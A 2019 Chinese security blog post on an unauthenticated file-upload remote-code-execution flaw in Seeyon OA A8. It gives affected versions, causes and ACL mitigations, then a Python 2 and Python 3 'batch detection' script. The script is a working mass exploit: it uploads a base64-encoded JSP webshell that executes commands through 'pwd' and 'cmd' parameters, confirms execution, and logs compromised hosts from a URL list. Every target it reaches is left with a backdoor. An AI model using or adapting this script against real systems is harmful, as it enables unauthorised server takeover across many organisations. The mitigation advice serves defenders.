«

seeyon_rce致远getshell 0day poc批量检测脚本——致远 OA A8 Getshell 漏洞

时间:2019-6-27 20:19     作者:admin     分类: 业界新闻

致远 OA A8 Getshell .png

本文主要是对于昨日大概晚间八点左右在网上出现的关于致远 OA A8 协同管理软件被曝存在远程代码执行漏洞0day,且目前已有漏洞被在野利用,在中、大型政府企业中都广泛使用。文末给出致远getshell 0day poc批量检测脚本(python版本)

已验证影响版本:

A8 V7.0 SP3

A8 V6.1 SP2

(V6.1 SP1 验证尚不存在,其他版本未验证)

漏洞成因:

致远 A8+ 某些版本系统,存在远程任意文件上传文件上传漏洞,并且无需登录即可触发。攻击者构造恶意文件,成功利用漏洞后可造成Getshell。同时该系统的漏洞点在于致远OA-A8系统的Servlet接口暴露,安全过滤处理措施不足,使得用户在无需认证的情况下实现任意文件上传。攻击者利用该漏洞,可在未授权的情况下,远程发送精心构造的网站后门文件,从而获取目标服务器权限,在目标服务器上执行任意代码。

影响范围:

通过知道创宇旗下ZoomEye网络空间搜索引擎搜索结果,全球共有29,425个致远OA系统开放记录,中国为29,247个大部分分布在北京、广东、四川等省。

目前利用代码已在野外公开,漏洞验证效果如下,成功getshell样例截图:

成功getshell.png  

缓解措施:

漏洞位置为:/seeyon/htmlofficeservlet,可以对该地址配置ACL规则。

或者联系官方获取补丁程序,官网地址:http://www.seeyon.com/Info/constant.html

临时修补方案如下:

1、 配置URL访问控制策略;

2、在公网部署的致远A8+服务器,通过ACL禁止外网对“/seeyon/htmlofficeservlet”路径的访问;

3、 对OA服务器上的网站后门文件进行及时查杀。

附上验证POC,致远getshell 0day poc批量检测脚本如下:

使用方法:

批量检测url

在脚本同目录下建立url.txt

放入待检测的URL运行脚本

分别为python2和python3版本:

# Wednesday, 26 June 2019
# Author:nianhua
# Blog:https://github.com/nian-hua/
# python2 版本

import re
import requests
import base64
from multiprocessing import Pool, Manager

def send_payload(url):

    headers = {'Content-Type': 'application/x-www-form-urlencoded'}

    payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="

    payload = base64.b64decode(payload)

    try:

        r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload)

        r = requests.get(
            url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming')

        if "wangming" in r.text:

            return url

        else:

            return 0

    except:

        return 0

def remove_control_chars(s):
    control_chars = ''.join(map(unichr, range(0,32) + range(127,160)))

    control_char_re = re.compile('[%s]' % re.escape(control_chars))

    s = control_char_re.sub('', s)

    if 'http' not in s:

        s = 'http://' + s

    return s

def savePeopleInformation(url, queue):

    newurl = send_payload(url)

    if newurl != 0:

        fw = open('loophole.txt', 'a')
        fw.write(newurl + '\n')
        fw.close()

    queue.put(url)

def main():

    pool = Pool(10)

    queue = Manager().Queue()

    fr = open('url.txt', 'r')

    lines = fr.readlines()

    for i in lines:

        url = remove_control_chars(i)

        pool.apply_async(savePeopleInformation, args=(url, queue,))

    allnum = len(lines)

    num = 0

    while True:

        print queue.get()

        num += 1

        if num >= allnum:

            fr.close()

            break

if "__main__" == __name__:

    main()


# Wednesday, 26 June 2019
# Author:nianhua
# Blog:https://github.com/nian-hua/
# python3 版本

import re
import requests
import base64
from multiprocessing import Pool, Manager

def send_payload(url):

    headers = {'Content-Type': 'application/x-www-form-urlencoded'}

    payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="

    payload = base64.b64decode(payload)

    try:

        r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload)

        r = requests.get(
            url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming')

        if "wangming" in r.text:

            return url

        else:

            return 0

    except:

        return 0

def remove_control_chars(s):
    control_chars = ''.join(map(chr, list(range(0,32)) + list(range(127,160))))

    control_char_re = re.compile('[%s]' % re.escape(control_chars))

    s = control_char_re.sub('', s)

    if 'http' not in s:

        s = 'http://' + s

    return s

def savePeopleInformation(url, queue):

    newurl = send_payload(url)

    if newurl != 0:

        fw = open('loophole.txt', 'a')
        fw.write(newurl + '\n')
        fw.close()

    queue.put(url)

def main():

    pool = Pool(10)

    queue = Manager().Queue()

    fr = open('url.txt', 'r')

    lines = fr.readlines()

    for i in lines:

        url = remove_control_chars(i)

        pool.apply_async(savePeopleInformation, args=(url, queue,))

    allnum = len(lines)

    num = 0

    while True:

        print(queue.get())

        num += 1

        if num >= allnum:

            fr.close()

            break

if "__main__" == __name__:

    main()

标签: 渗透测试 0day getshell rce

版权所有:Mrxn's Blog
文章标题:seeyon_rce致远getshell 0day poc批量检测脚本——致远 OA A8 Getshell 漏洞
除非注明,文章均为 Mrxn's Blog 原创,请勿用于任何商业用途,转载请注明作者和出处 Mrxn's Blog
扫描二维码,在手机上阅读

推荐阅读:

评论:
avatar
bob 2019-07-01 11:16
你好,确定是/seeyon/htmlofficeservlet页面出现err信息就是存在漏洞吗? 我本地的A8 V6.1 SP2版本使用您的poc脚本,shell未上传成功
commentator
Mrxn 2019-07-01 16:35
@bob:你可以手动访问这个路径 测试 POC 并不是所有的都一定可以啊 如果服务端修改过 就不行了 就需要修改POC啊